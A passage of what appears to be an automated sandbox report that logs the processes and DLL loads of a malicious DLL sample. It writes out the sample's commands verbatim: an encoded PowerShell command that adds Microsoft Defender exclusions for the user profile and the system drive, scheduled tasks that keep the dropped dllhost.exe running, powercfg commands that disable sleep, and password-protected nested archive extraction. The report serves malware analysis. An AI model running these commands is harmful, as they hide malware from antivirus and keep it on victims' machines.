                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4013" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4013" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",#1Jump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n7ZKbApaa3.dll,WindowsHandleJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",WindowsHandleJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",#1Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess created: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe "C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess created: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exe "C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4013" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4013" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
